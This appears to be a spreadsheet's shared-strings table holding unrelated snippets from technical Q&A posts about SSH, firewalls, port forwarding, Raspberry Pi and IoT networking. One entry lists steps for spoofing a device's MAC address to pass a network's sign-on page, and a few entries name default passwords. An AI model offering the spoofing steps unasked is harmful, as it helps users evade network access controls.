[host.com] [Fri Aug 05 03:57:33 2016] [error] [client 24.28.29.44] client denied by server configuration: /home/domains/host.com/.htaccess
I checked the server setting and according to support, everything should be set for remote access.</t>
  </si>
  <si>
    <t>Please verify that the remote tools
  are installed correctly on the remote machine, and that the correct
  remote authentication mode is specified in the project debug settings.</t>
  </si>
  <si>
    <t>It allows you to force disconnect devices from the network, ban sims from the account so a stolen or runaway sim can eat through data, basic connectivity tests (is the modem powered, does the sim have permission to transmit data over the network, etc).</t>
  </si>
  <si>
    <t>You could set up aliases in your local .ssh/config file:
With this in place, you could ssh pi or ssh desktop and ssh would pick the remote username and remote port from your configuration file.</t>
  </si>
  <si>
    <t xml:space="preserve">
You need to install the generated certificates manually in /etc/gitlab/ssl and set the external url to https in /etc/gitlab/gitlab.rb as described in: https://gitlab.com/gitlab-org/omnibus-gitlab/blob/master/doc/settings/nginx.md
I prefer to use symlinks, so you dont need to copy the certificates.</t>
  </si>
  <si>
    <t>With the application installed on a device linked to a Google account, and location services turned off, it can be used to track a lost phone or remotely wipe all data if configured accordingly.</t>
  </si>
  <si>
    <t>(If your router supports forwarding a different external address to internal port 22, I recommend doing that for extra security.)</t>
  </si>
  <si>
    <t>-Y flag treats the remote client as trusted which allows full control of the local X window environment.</t>
  </si>
  <si>
    <t>Note When building PyQt5 v5.11 or later you must configure SIP to create a private copy of the sip module using a command line similar to the following:
python configure.py --sip-module PyQt5.sip --no-tools
Thank download PyQt5.11 and  :
python3 configure.py
after that:
make
sudo make install
You need to have installed Qt5.10 or later before this.</t>
  </si>
  <si>
    <t>In some environments, best practices for secure coding may prohibit the persistent storage of sensitive data through the File System API, as malicious code running locally on the host machine may gain access to the sandboxed storage area.</t>
  </si>
  <si>
    <t>First I've tried to call it with this code:
But then I get the error:
Next I've tried to use "Windows.Web.Http.HttpClient":
var filter = new HttpBaseProtocolFilter();
filter.AllowAutoRedirect = true;
filter.ServerCredential = new PasswordCredential("&lt;Domain&gt;", "&lt;username&gt;", "&lt;password&gt;");
filter.AllowUI = false;
JPasswordChangeData jPasswordChangeData = new JPasswordChangeData()
{
    OldPassword = oldpassword,
    NewPassword = newpassword
};
Windows.Web.Http.HttpClient windowsHttpClient = new Windows.Web.Http.HttpClient(filter);
//HttpClient httpClient = new HttpClient();
var httpResponseMessage = await windowsHttpClient.PutAsync(
new Uri("http://MyDomain:6001/api/ActiveDirectory/ChangePassword/" + txtblk_samaccountname.Text.Trim()),
new HttpStringContent(JsonConvert.SerializeObject(jPasswordChangeData), Windows.Storage.Streams.UnicodeEncoding.Utf8, "application/json"));
I've also set the needed Funcions in the Package.appxmanifest.</t>
  </si>
  <si>
    <t>They allow you to author your installation using only the native Windows Installer feature set.</t>
  </si>
  <si>
    <t>I've tried turning the firewall off in my router
I've tried turning the firewall off on my Win2k12 server
I've added TCP 1883 to allowed ports outbound from my Win2k12 server
The Python script:
The output here is
Disconnect, reason: &lt;paho.mqtt.client.Client object at 0x01F41EF0&gt;
Disconnect, reason: 1
I've tried to have a look at the documentation but it only mentioned the flags, not defining what they are.</t>
  </si>
  <si>
    <t>But how to discover the COAP server sitting at home from a remote location and then talk to it considering that COAP server will be on a private IP address.</t>
  </si>
  <si>
    <t>UPDATE: Just did a clean installation and now it works fine and can be accessed remotely at any time.</t>
  </si>
  <si>
    <t>(I would like to do this wireless if possible)
I have tried:
Shut Down Your Windows PC Remotely From Linux
Thanks
Ben</t>
  </si>
  <si>
    <t>You can use ATNR on the router to perform a Network Reset so it will try to re-join your coordinator.</t>
  </si>
  <si>
    <t>A utility for installing, listing and granting permissions for certificates on Windows.</t>
  </si>
  <si>
    <t>It is your responsibility to be aware of what you install and to update when necessary in order to get security fixes.</t>
  </si>
  <si>
    <t>What I'm expecting to see: I call with my cellphone (and that number is in the blacklist) the Raspberry doesn't make the phone ring, or in case of wrong configuration of the blacklist I get some output that will show a call not filtered.</t>
  </si>
  <si>
    <t>Project:
Convert an existing Sky remote into a Bluetooth HID device (to control PC)
Steps:
Remove IR LED
Use existing remote circuit
Decode output details
Translate output to keyboard button press
Use bluetooth HC-05 with RN42 firmware for Bluetooth HID capabilities
Sit back and control PC with sky remote :)
Problem:
Using the existing circuit, I want to read the output values sent by the controller to the IR LED.</t>
  </si>
  <si>
    <t>I disabled firewall of my router and observed my router's external IP.</t>
  </si>
  <si>
    <t>To ensure that my codes are correct I ran the codes on my local machine, it runs perfectly fine.</t>
  </si>
  <si>
    <t>I would love to avoid opening up for external internet traffic in my router.</t>
  </si>
  <si>
    <t>While installing  and face_recognition, it turns out the face_recognition library is not possible on python 2.7.13, but it is working fine on python python 3.5 where as opencv is working fine on python 2.7 but it is not installing on python 3.5.</t>
  </si>
  <si>
    <t>D. from this page 
copy COM7 &gt; CON
and
copy COM7 2&gt;&amp;1
and 
copy COM7 | more
all led to the error:
Access is denied.</t>
  </si>
  <si>
    <t>Multiple channels
It is wise to use multiple channels, mainly to avoid multipath interference.</t>
  </si>
  <si>
    <t>This flag grants all requested permissions on install, so you can avoid the reboot.</t>
  </si>
  <si>
    <t>Windows firewall
I am no expert on this, but I think the default setting of Windows firewall lets multicast through.</t>
  </si>
  <si>
    <t>Password required
    230-Your bandwidth usage is restricted
    230-OK. Current restricted directory is /
    230 Max allowed filesize is 10485760 bytes
    215 UNIX Type: L8
    227 Entering Passive Mode (95,211,144,65,208,115)
    Data port: 53363
    Data connected
    553 Can't open that file: No such file or directory
    221-Goodbye.</t>
  </si>
  <si>
    <t>Password required
    230-Your bandwidth usage is restricted
    230-OK. Current restricted directory is /
    230 Max allowed filesize is 10485760 bytes
    215 UNIX Type: L8
    227 Entering Passive Mode (95,211,144,65,208,248)
    Data port: 53496
    Data connected
    553 Can't open that file: No such file or directory
    221-Goodbye.</t>
  </si>
  <si>
    <t>my iot devices are configured for mgmt actions, device informations get updated if required and i can see the device meta information via the dashboard, but it is not possible  to start device actions or modify device metadata via the dashboard.</t>
  </si>
  <si>
    <t>So I suggest you to install lightweight display manager like LightDM if possible it has almost no footprint and then easy you can set it up to auto login with desired user and run desired window manager like matchbox in your case.</t>
  </si>
  <si>
    <t>There is fastest and effective way to copy your public key to a remote machine's is with ssh-copy-id
If you edit authorized_keys by hand ensure that authorized_keys and .ssh folder has the correct permissions :</t>
  </si>
  <si>
    <t>Even if the port is open on the external interface of your router, that doesn't necessarily imply that port forwarding is setup correctly, just that the router isn't flat-out rejecting that traffic.</t>
  </si>
  <si>
    <t>Developers may use this capability to test new operating system without installing it, or to gain access to non-encrypted fixed hard drive if the main operating system does not boot any longer.</t>
  </si>
  <si>
    <t>Assuming the deployment of the dummy solution worked, then connect to the device using powershell and issue these commands
You should see msvsmon running if you browse to http://minwinpc:8080/#Debug (as shown below)
Now this time, change the remote debugging settings in the visual studio project to Windows authentication
then click Start Remote Debugging</t>
  </si>
  <si>
    <t>That means they can't directly talk to each other without some special network/firewall configuration (NAT).</t>
  </si>
  <si>
    <t>Both are configured with Samba and both share just fine on my Windows 10 machine with the correct user/password combinations.</t>
  </si>
  <si>
    <t>It is very important to do this to avoid false detections and to 
 avoid your Arduino can still freeze because of that.</t>
  </si>
  <si>
    <t>This flag grants all requested permission on install, so you can avoid the reboot.</t>
  </si>
  <si>
    <t>ZigBee routers are mains powered devices that do not sleep in order to route data in the network.</t>
  </si>
  <si>
    <t>Here an extract of the Requirements installation from the full guide of mine project on GitHub:
Install PC/SC and libnfc (references: nfc-tools, libnfc):
Additionaly, you may need to grant permissions to your user to drive the device.</t>
  </si>
  <si>
    <t>XACML defines 4 possible decisions:
Permit: access is allowed
Deny: access is denied
NotApplicable: the PDP cannot tell whether access should be allowed or denied
Indeterminate: an error occurred during policy evaluation
XACML is said to be policy-based and attribute-based since it builds on top of policies that are made of attributes.</t>
  </si>
  <si>
    <t>Is there a way that I can connect an iPhone to a Raspberry Pi over Wi-Fi Direct or Bluetooth/BTLE, without using private methods, that does not require neither the MFi program nor having both devices join the same network?</t>
  </si>
  <si>
    <t>The other alternative is creating a Wi-Fi hotspot, with no NAT, but I don't really have a deep knowledge on networks so I'm really lost in which IP adresses I have to set.</t>
  </si>
  <si>
    <t>Some routers also don't like you requesting a certain IP, so you can also set it to DHCP on the RPi and configure the router so that it always assigns a certain IP to the device.</t>
  </si>
  <si>
    <t>Somehow it's working now after changing the device name, changing the administrator password (p@ssw0rd) to something new, and setting a remote debugging pin.</t>
  </si>
  <si>
    <t>A utility for installing, listing and granting permissions for certificates on Windows, runnable via the command line.</t>
  </si>
  <si>
    <t>A file system object has 3 sets of access permissions, one set for the owner, one set for the group and one set for others.</t>
  </si>
  <si>
    <t>Additionally, it should be said that the SO community does a great job of policing these things themselves with flags, something that helps all moderators.</t>
  </si>
  <si>
    <t>UPDATE #1:
I found Managed Wifi API which allows you to control Wifi (802.11) network adapters installed in your Windows machine programmatically.</t>
  </si>
  <si>
    <t>We tried opening for all windows update dns entries that Windows 10 uses but this specific firewall does not permit wildcard dns in its rules.</t>
  </si>
  <si>
    <t>However, it seems like the Pi isn't bridging / routing correctly or getting stopped by a firewall, as from the remote user I cant see the local network 192.168.20.xxx.</t>
  </si>
  <si>
    <t>On the phone running this hotspot, I am assuming you can install apps that permit you to SSH into the Pi, headless?</t>
  </si>
  <si>
    <t>Update and upgrade your package indexsudo apt-get update &amp;&amp; sudo apt-get upgrade
Obtain your IP address via sudo ifconfig
Install xRDP sudo apt-get install xrdp
Now assuming your laptop is Windows, run the Remote Desktop Connection program and proceed with your IP address and login.</t>
  </si>
  <si>
    <t>Windows Azure Virtual Network enables you to create a logically isolated section in Windows Azure and securely connect it to your on-premises datacenter or a single client machine using an IPsec connection.</t>
  </si>
  <si>
    <t>Authorization may be determined based on a range of restrictions, for example time-of-day restrictions, or physical location restrictions, or restrictions against multiple access by the same entity or user.</t>
  </si>
  <si>
    <t>To schedule, view, or change a task on a remote computer, you must be member of the Administrators group on the remote computer, or you must use the /u parameter to provide the credentials of an Administrator of the remote computer.</t>
  </si>
  <si>
    <t>Wi-Fi certified and compliant devices are installed in many personal computers, video game consoles, MP3 players, smartphones, printers, digital cameras, and laptop computers.</t>
  </si>
  <si>
    <t xml:space="preserve">
discover the device's mac address
remove the device's power source
configure your laptop's wifi card to override its built-in MAC address and instead assume the IoT device's MAC address
sign on to the wireless network and accept terms with your laptop, spoofing the device's hardware address
return the laptop to normal configuration
power up the IoT device
PROFIT!</t>
  </si>
  <si>
    <t>which is a linux command to find where 'node' is installed
setcap set's same file permissions to cap_net.. as found for the link where node is installed...
all abit complicate, basically it allows users to access cap_net as mentioned on the github side</t>
  </si>
  <si>
    <t>I read that Wifi Direct would allow me to SSH into my Raspi (and thus control it) using my Windows 10 laptop, without using an existing wifi network.</t>
  </si>
  <si>
    <t>Virtuozzo creates multiple virtual independent environments (VEs, also known as virtual private servers, or VPSs) on only one physical server.</t>
  </si>
  <si>
    <t>It provides a decentralized Turing-complete virtual machine, the Ethereum Virtual Machine (EVM), which can execute scripts using an international network of public nodes.</t>
  </si>
  <si>
    <t>Here is my requirements file:
certifi==2017.11.5
chardet==3.0.4
coverage==4.4.2
Django==2.0.1
gitdb2==2.0.3
GitPython==2.1.9
gunicorn==19.7.1
idna==2.6
netifaces==0.10.6
nose==1.3.7
psycopg2==2.7.3.2
python-nmap==0.6.1
pytz==2017.3
requests==2.18.4
simplejson==3.13.2
smmap2==2.0.3
urllib3==1.22
xml2json==0.1
However, if I attempt to install the packages one-by-one it works fine:
&gt; pip install certifi
Collecting certifi
  Downloading certifi-2018.1.18-py2.py3-none-any.whl (151kB)
    100% || 153kB 187kB/s 
Installing collected packages: certifi
Successfully installed certifi-2018.1.18
So, I don't think it's a dependency issue.</t>
  </si>
  <si>
    <t>Shellcode can either be local or remote, depending on whether it gives an attacker control over the machine it runs on (local) or over another machine through a network (remote).</t>
  </si>
  <si>
    <t>Links:
Linux Firewall Tutorial: IPTables Tables, Chains, Rules Fundamentals
Iptables Essentials: Common Firewall Rules and Commands</t>
  </si>
  <si>
    <t>I think the reason you can not access the remote mysql may be due to the remote access restriction in 
please check the line
bind-address: is set to 127.0.0.1
under this restriction, you can not connect remotely with that mysql server;
to solve this, you need to change this line to:
bind-address: 0.0.0.0 
in addition you should specify the port for connection as below:
String URL = "jdbc:mysql://192.168.11.157:3306/DB_name";
because mysql will connect port 3306 in default.</t>
  </si>
  <si>
    <t>It is very important to do this to avoid false detections and to avoid your Arduino can still freeze because of that.</t>
  </si>
  <si>
    <t>Examples of types of service include, but are not limited to: IP address filtering, address assignment, route assignment, quality of Service/differential services, bandwidth control/traffic management, compulsory tunneling to a specific endpoint, and encryption.</t>
  </si>
  <si>
    <t>Mobile Device Management is a way to give IT departments the ability to securely enroll devices in an enterprise environment, wirelessly configure and update settings, monitor compliance with corporate policies, and remotely wipe or lock managed devices.</t>
  </si>
  <si>
    <t>I am looking for which window to open, but how can I open the window (depending on which physical button is pressed on circuit) first, then re-read the Serial for whether the user was verified, and then change things on the window?</t>
  </si>
  <si>
    <t>With such a setup as you describe, you can have a configuration computer within bluetooth range of all your beacons, and programmatically push identifier changes over the air whenever you want -- either in an ad-hoc manner or at regular intervals to rotate identifiers for anti-spoofing reasons.</t>
  </si>
  <si>
    <t>Well one options is to use scp - secure copy, scp copies files between hosts on a network.</t>
  </si>
  <si>
    <t>Try "sudo make" and "sudo make install"
You also might need to install the libssl-dev package if you havent done so already.</t>
  </si>
  <si>
    <t>https://www.hackster.io/krvarma/rpivoice-051857
Perhaps there is in future driver updates in Windows Updates and we no longer have such problems.</t>
  </si>
  <si>
    <t>you can focus on firewall/iptables/routing/ip configuration issues, so let's go ahead with those.</t>
  </si>
  <si>
    <t>The Java virtual machine shuts down in response to two kinds of events:
The program exits normally, when the last non-daemon thread exits or when the exit (equivalently, System.exit) method is invoked, or
The virtual machine is terminated in response to a user interrupt, such as typing ^C, or a system-wide event, such as user logoff or system shutdown.</t>
  </si>
  <si>
    <t>VX ConnectBot terminal emulator (Free in the Google Play store)
Hackers Keyboard - because I like tab complete (Free in the Google Play store)
Assumptions:
Your PI is configured to run SSHd on startup
You are using the default Pi username / password
Your Android device has internet connectivity via WiFi/3G and it is enabled
How to do it:
Add the following to /etc/network/interfaces
Power down your Pi
Connect your Android device to your Pi via it's USB data cable
Power up your Pi... wait about a minute.</t>
  </si>
  <si>
    <t>I really suggest not to push via ssh into the remote pis anything as that means they will have to expose themselves to the public internet which from security point of view is definitely not recommended and you will have to set it up in every location (the router rules to expose the pi, setup static IP in local network, setup DNS for client location).</t>
  </si>
  <si>
    <t>See also
Official help site
Bitbucket API
See more
Set up Git and Mercurial on Windows
Create an Account and a Git Repo
Clone Your Git Repo and Add Source Files
Fork a Repo, Compare Code, and Create a Pull Request
Add Users, Set Permissions, and Review Account Plans
Set up a Wiki and an Issue Tracker
Set up SSH for Git
Mac Users: SourceTree a Free Git and Mercurial GUI
Sourcetree Git GUI on Windows</t>
  </si>
  <si>
    <t>In recent years there have been numerous reports of confidential data such as customers' personal records being exposed through loss or theft of laptops or backup drives.</t>
  </si>
  <si>
    <t>They can be used for various control operations, such as sending and receiving data, changing operating modes, executing forced set and forced reset operations, performing file operations, and so on.</t>
  </si>
  <si>
    <t>Next attempt was on another new (less than 3 months old) laptop running windows 10 and it failed to remote in via the hostname.</t>
  </si>
  <si>
    <t>The more complicated method
This involves doing what you suggested, configuring the virtual machine quest to be able to get an IP address from your router.</t>
  </si>
  <si>
    <t>if you are a sudo user on both machines, and configured ssh without password, you can try if this works for you:
which should transfer keyboard to remote, without touching other comp, and perform 50% of synergy greatenest with just 2 common tools cat/ssh.</t>
  </si>
  <si>
    <t>You'd need to use an implementation of SSDP to discover your router, once you have discovered your router, you can send commands using UPnP wrapped around SOAP enveloppes.</t>
  </si>
  <si>
    <t>Most modern circuits - like using power surge protectors and multiple circuit breakers - can filter out the single between one side of the house to the other.</t>
  </si>
  <si>
    <t>Then set your authentication by typing set wlan auth 3 (Mixed WPA1 &amp; WPA2-PSK) or set wlan auth 4 (WPA2-PSK) this depends on the type of authentication you ise so pick the write one for your network.</t>
  </si>
  <si>
    <t>Endpoints are monitored, so that traffic can be automatically re-directed in case of endpoint failure.</t>
  </si>
  <si>
    <t>It ensures that DNS requests are handled safely and explicitly rejects any traffic other than TCP from the application you're using.</t>
  </si>
  <si>
    <t>I tried using the virtual machine with windows guest OS, since microsoft has a special programm to do this on windows, but it doesn't detect the SD card.</t>
  </si>
  <si>
    <t xml:space="preserve">
Attribute Based Access Control (ABAC) is an access control method
  where subject requests to perform operations on objects are granted or
  denied based on assigned attributes of the subject, assigned
  attributes of the object, environment conditions, and a set of
  policies that are specified in terms of those attributes and
  conditions.</t>
  </si>
  <si>
    <t>SSH is typically used
  to log into a remote machine and execute commands, but it also
  supports tunneling, forwarding arbitrary TCP ports and X11
  connections; file transfer can be accomplished using the associated
  SFTP or SCP protocols.</t>
  </si>
  <si>
    <t>Trend Micro Deep Security is a tool that improves visibility and simplifies security management across physical, virtual, and cloud environments.</t>
  </si>
  <si>
    <t>Deploying on a local machine works pretty fine, but while deploying to my RaspberryPi running Windows 10 IOT, the "Windows" to enter the credentials doesn't even open!</t>
  </si>
  <si>
    <t>This, however, requires a reconfiguration for most routers to enable port-forwarding or disabling the firewall.</t>
  </si>
  <si>
    <t>In the catch block in the code above, add the following
That will ensure that there is no incorrectly configured certificate hanging around to trip you up.</t>
  </si>
  <si>
    <t>Important thing of this case is, that even if I try to locally (hdmi, keyboard, mouse) execute
I still get "connection refused on port 22", I have no firewall and no other security stuff enabled and my router is set to forward SSH.</t>
  </si>
  <si>
    <t>Asked three different people with different Android phones for help:
-Newest Samsung phone: Bonds
-Older Samsung phone: Bonds
-OnePlus One phone: Does NOT bond
Hypothesis
Bluetooth library on the devices that cant connect might be lacking handshake protocol when talking to the HM-10 module.</t>
  </si>
  <si>
    <t>Purpose of WinRM
Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems, from different vendors, to interoperate.</t>
  </si>
  <si>
    <t>In the system service manifest, it set as follows in order to work as a system application
However if you need to run this on a rooted device, you can simply remove that attribute from the manifest and make app as a system app using root utility application in order to enroll device with COPE ownership.</t>
  </si>
  <si>
    <t>I followed various tutorials and finally I managed to set all the permissions in order to get transmission doing the job.</t>
  </si>
  <si>
    <t>Try  and enable ssh
Furthermore, ensure you have the correct IP address by running sudo ifconfig
Lastly, if you wish to remotely connect to your Pi &amp; also its GUI, on your pi install xrdp like such, sudo apt-get install xrdp
Then on your home computer run Remote Desktop Connection and proceed.</t>
  </si>
  <si>
    <t>A security setting for Windows PowerShell that enables you to determine which Windows PowerShell scripts (if any) will be allowed to run on your computer.</t>
  </si>
  <si>
    <t>RBAC is short for Role Based Access Control, an authorization and access control model in which access to restricted resources is granted or denied based on whether the requester's identity is associated with one or more role classifications required by the restricted resource.</t>
  </si>
  <si>
    <t>VMware Tools is comprised of the following components:
VMware Device Drivers - replaces many of the guest operating system drivers for physical hardware to ensure network connectivity and prevent drive compatibility issues.</t>
  </si>
  <si>
    <t>vi family is required for in cases when graphic environment with other editors available is not present, has failed to boot, is slow to access remotely or avoided just for that edit as the editor must be launched under root rights.</t>
  </si>
  <si>
    <t>This same set-up worked fine under a personal (regular router-ISP) network connection, but failed once set in a larger and more secured network.</t>
  </si>
  <si>
    <t>So, when you connect locally, all of that is happening behind the router from one trusted source to another, but to connect from anywhere else, you need to tell the router to allow incoming traffic on a certain port to go through to a certain device.</t>
  </si>
  <si>
    <t>Since the FTDI D2XX drivers simply use libusb on the backend in order to actually talk with the device, you need to have the proper permissions in order to actually talk with it.</t>
  </si>
  <si>
    <t>You can additionally configure an alarm in AWS CloudWatch to watch this metric and perform an action if the alarm threshold is ever breached.</t>
  </si>
  <si>
    <t>I can only work with C#3.5 to avoid triggering the overly sensitive virus detection :)
I can't set up servers
I can only run stuff in windows
I can't run installers</t>
  </si>
  <si>
    <t>The setup section looks like this (ssid and password defined earlier of course):
-So it's a copy-paste from the examples, and it works fine.</t>
  </si>
  <si>
    <t>Once you have port forwarding for port 22 set up on your phone then you can SSH to the phone's IP and it will route the port 22 traffic over to the Pi and you'll be set.</t>
  </si>
  <si>
    <t>Some beacon manufacturers may expose a secondary configuration service that is connectable, but this is not universal and if it exists it is entirely outside the beacon spec.</t>
  </si>
  <si>
    <t>* update 2-3-2018 *
I have this detection algorithm down to about 5 minutes, using a combination of ping/arp messages directed to each phone, about once per minute.</t>
  </si>
  <si>
    <t>You might try setting all the DCB options and clearing port errors
Probably unrelated, but I noticed I at some point added a security descriptor to CreateFile() in my serial code, I believe some configuration of Windows Server required it.</t>
  </si>
  <si>
    <t>Its rich feature set includes SSL encryption, IPv6, bandwidth throttling, PAM integration, virtual users, virtual IPs and per-user / per-IP configuration.</t>
  </si>
  <si>
    <t>A Network Security Group(NSG) contains security rules that allow or deny inbound network traffic to, or outbound network traffic from, several types of Azure resources.</t>
  </si>
  <si>
    <t>All recent versions of Windows require such a signature in order to easily or programmatically install a driver.</t>
  </si>
  <si>
    <t>Sometimes the router or switch has to be configured to allow the sniffer to capture traffic being routed through it; this is called port mirroring.</t>
  </si>
  <si>
    <t>Durability - The durability property ensures that once a transaction has been committed, it will remain so, even in the event of power loss, crashes, or errors.</t>
  </si>
  <si>
    <t>Designed as a network analysis and detection tool, it can be easily configured to talk to ipchains, firewalls, routers, and more.</t>
  </si>
  <si>
    <t>&lt;!-- This configuration file specifies the required security policies
     for Bluetooth core daemon to work.</t>
  </si>
  <si>
    <t>This solution is not ideal bacuse:
It will only work in your home network
It will require you to configure a static IP for you RPi
It will require you to verify with your internet provider that your router's public IP will not change
It will stop working if you ever replace your router or factory-reset it.</t>
  </si>
  <si>
    <t>unplug not necessary,just uninstall your port,restart and install driver again.you will see arduino COM port under the LPT &amp; PORT section.</t>
  </si>
  <si>
    <t>The core features include:
Contacts and Groups - Querying groups and contacts and creating presence subscriptions
Two-party and Multi-party IM
Schedule an Online Meeting
Join an Online Meeting
Contact Card - Querying presence/note/location
Phone Audio - Call via Work feature
Anonymous Access - anonymously join a meeting
UCWA is available for On-Premises and Hybrid Lync 2013 / SfB installations as of Cumulative Update 1, but needs to be explicitly enabled by the administrator.</t>
  </si>
  <si>
    <t>Otherwise, you'd be exposing your commands to anyone snooping on your internet traffic, and random people will be controlling your devices 
Either way, if you want access both internal and external to home, you can do more research to see if you can "port forward" your router</t>
  </si>
  <si>
    <t>Ok so running raspberry pi (RetroPie) and have a python script running a shutdown, but I want to avoid any possible data corruption when the power button is pressed.</t>
  </si>
  <si>
    <t>Malware detection relates to any form of discovering whether or not a file contains undesired source instructions, that would perform malicious instructions, ranging from stealing information, directing users to unrequested actions, or even damaging the hardware.</t>
  </si>
  <si>
    <t>Startup time optimization
Locking/threading/race conditions
Checking preconditions (e.g., presence of required folders / files, security checks)
Handling of configuration changes (i.e., whether the application has to be redeployed / recompiled / restarted)</t>
  </si>
  <si>
    <t>I discovered that although the Band SDK worked with Windows IoT Core, there was limited functionality with regard to certain sensors which require user interaction through consent prompts.</t>
  </si>
  <si>
    <t>This sublanguage effectively describes a safe virtual machine for memory-unsafe languages like C or C++.</t>
  </si>
  <si>
    <t>Neither third librairies nor external JS are required, providing security and peace of mind for your achievements and your future.</t>
  </si>
  <si>
    <t>Sometimes if you shut power off immediately without shutting down the galileo through software, shutdown /s in cmd prompt the sd card gets corrupted.</t>
  </si>
  <si>
    <t>For carrier grade NAT or if you cannot configure your router's firewall to allow incoming connections, you should use another MQTT broker on the Internet somewhere.</t>
  </si>
  <si>
    <t>Emulation
Download and extract http://sourceforge.net/projects/rpiqemuwindows/
Start the QEMU by running run.bat
Install and configure Raspbian (user: pi, password: raspberry)
Close the QEMU
The vm-image has a very small drive of ~300MB free space which is not enough to install Java + Jenkins.</t>
  </si>
  <si>
    <t>Notification via inotify requires the kernel to be aware of all
  relevant filesystem events, which is not always possible for networked
  filesystems such as NFS where changes made by one client are not
  immediately broadcast to other clients.</t>
  </si>
  <si>
    <t>My understanding is that the only way to have BOTH a keyboard wedge AND allow soft keyboard input (without requiring user interaction) is to set the secure setting SHOW_IME_WITH_HARD_KEYBOARD = 1, which cannot be done programmatically, because it requires the WRITE_SECURE_SETTINGS permission, which the OS won't grant.</t>
  </si>
  <si>
    <t>As for 
win10 security restrictions (requiring user permissions to access
  areas etc., preventing traditional File.Write/path based access to
  anything other than your application data directory).</t>
  </si>
  <si>
    <t>As I stated in the above-linked question, general Bluetooth communication to external devices on non-jailbroken iOS devices is restricted to MFi-compliant Bluetooth hardware.</t>
  </si>
  <si>
    <t>Key is that anyone observing the flow of traffic from your computer to the concentrator (also called "VPN gateway") only sees you talking to the concentrator - they don't know what IP addresses inside the firewall you are talking to, with what protocol, or what data.</t>
  </si>
  <si>
    <t>It uses ssh for data transfer, and uses the same authentication and provides the same security as ssh
Another option is to mount your remote file system by means of sshfs - (Secure SHell FileSystem) is a file system for Linux capable of operating on files on a remote computer using just a secure shell login on the remote computer.</t>
  </si>
  <si>
    <t>Unless you have different machines with different levels of trust (for example, a work machine and a personal machine), you don't need to generate different pair of keys on the same machine for different services.</t>
  </si>
  <si>
    <t>Also, if you want to use HTTP Bridge instead, you can define the configuration in Cloud IoT Core, as described in the documentation and later retrieve it manually by explicitly requesting the device configuration.</t>
  </si>
  <si>
    <t>lshell is a shell coded in Python, that lets you restrict a user's environment to limited sets of commands, choose to enable/disable any command over SSH (e.g.</t>
  </si>
  <si>
    <t>AppDomainSetup provides configuration information for a new application domain which is an isolated environment in which Microsoft .NET assemblies can be sandboxed, granted specific permissions or PermissionSets and executed.</t>
  </si>
  <si>
    <t>The proc filesystem is a virtual filesystem through which kernels of Unix-like operating systems, including Linux, expose process and kernel information.</t>
  </si>
  <si>
    <t>In
addition, depending on the encryption granularity, the application may have to
retrieve a larger set of data than the one granted to the actual user, thus opening a
security breach.</t>
  </si>
  <si>
    <t>For instance, a web browser or proxy
  server can efficiently check whether a remote file has been modified,
  by fetching only its fingerprint and comparing it with that of the
  previously fetched copy.</t>
  </si>
  <si>
    <t>These lockfiles lock the installed dependencies to a specific version, and ensure that every install results in the exact same file structure in node_modules across all machines.</t>
  </si>
  <si>
    <t>While these are normally equivalent to client and server in the traditional sense, the distinction is important for establishing secure peer-to-peer connections.</t>
  </si>
  <si>
    <t>I've cast a massive number of flags, and lost count of the number of voting rings, sock puppet accounts, and spammers I've helped shut down.</t>
  </si>
  <si>
    <t>An administrator account is a user account on an operating system which allow make changes that can affect other users (including, but not limited to, the creation and restriction of user accounts), change operating system options (including  security settings), install software and drivers, access all files.</t>
  </si>
  <si>
    <t>In almost all cases, this requires a two-phase commit managed by a distributed transaction coordinator (MSDTC in .NET) along with various security settings and firewall ports opened and available whereby such components can communicate, not to mention a ubiquitous requirement for Microsoft Windows on all machines in .NET environments.</t>
  </si>
  <si>
    <t>Bundler can ask for sudo if it is needed,
  and installing your bundle as root will break this application for all
  non-root users on this machine.</t>
  </si>
  <si>
    <t>It doesn't make sense to perform node discovery on a device that isn't currently joined to a network.</t>
  </si>
  <si>
    <t>Inbound network traffic to a  can be controlled by applying Inbound Security Rules.</t>
  </si>
  <si>
    <t>Write all sector trailers of sectors assigned to the NDEF application to set key A to D3F7D3F7D3F7, to set the GPB to 40, to set your application-specific (secret) key B and to set the access conditions to a sensible value.</t>
  </si>
  <si>
    <t>For security reasons, Universal Windows Applications can only have access to certain types of files on external drives,
Music
Picture
Video
And you have to explicitly declare it in the Package.appxmanifest file.</t>
  </si>
  <si>
    <t>I'm also having a problem with using wiringPi lib while I'm trying to remote debugging my program, since I have to run it as root for GPIO configuration.</t>
  </si>
  <si>
    <t>Ensuring that the internal API exposed by that code doesn't markup arbitrary values as safe then becomes a more manageable task.</t>
  </si>
  <si>
    <t>):
To configure the docker client with experimental features, you can set the following in your local $HOME/.docker/config.json:
{
   "auths": { ... },
   "experimental": "enabled"
}
Note in the above, the auths section is likely already configured if you've performed a docker login.</t>
  </si>
  <si>
    <t>I configured with:
I also had to install libbsl-dev to get the MD5 that smpd requires.</t>
  </si>
  <si>
    <t>Afterwards we copied the TADATA.FDB File from the Windows 7 machine onto the Pi and set the SYSDBA password to "masterkey".</t>
  </si>
  <si>
    <t>Please see Help for assistance on configuring remote debugging.</t>
  </si>
  <si>
    <t>Getting access is denied
i'm getting Error: 5 'Access is denied' when trying to perform the impersonation.</t>
  </si>
  <si>
    <t>Which of machines in my LAN should configure a firewall?</t>
  </si>
  <si>
    <t>APPLICATION RIGHTS ARE GRANTED UPON DEVICE RESTART not application restart.</t>
  </si>
  <si>
    <t>If that doesn't work then your VM's network configuration is probably set incorrectly.</t>
  </si>
  <si>
    <t>The OpenSSH server (the sshd) is configured using sshd_config files.</t>
  </si>
  <si>
    <t>JsFiddle or JS Bin can be used if your code is behind a firewall on a dev environment.</t>
  </si>
  <si>
    <t>How to make sure this will only work locally (checking the IP of the host, or downloading a certificate on my smartphone, the easiest route)?</t>
  </si>
  <si>
    <t>This dynamic sourcing of outbound traffic can make it difficult to integrate with APIs or make connections through firewalls that require IP-based whitelisting.</t>
  </si>
  <si>
    <t>I manage to do that typing this on pi-server :
I type my password and then I  am prompted on pi-backup and all is great (pi-backup's ssh listen on 22 but I redirect 4444 to 22 with my router, heard it was more secured)
As I would like to script the connexion to be able to cron it everyday, I can't authentify by password, so I tried keys : I generated a key on pi-server using 
Then I copy/pasted id_rsa_pub in /home/userBackup/.ssh/authorized_keys...</t>
  </si>
  <si>
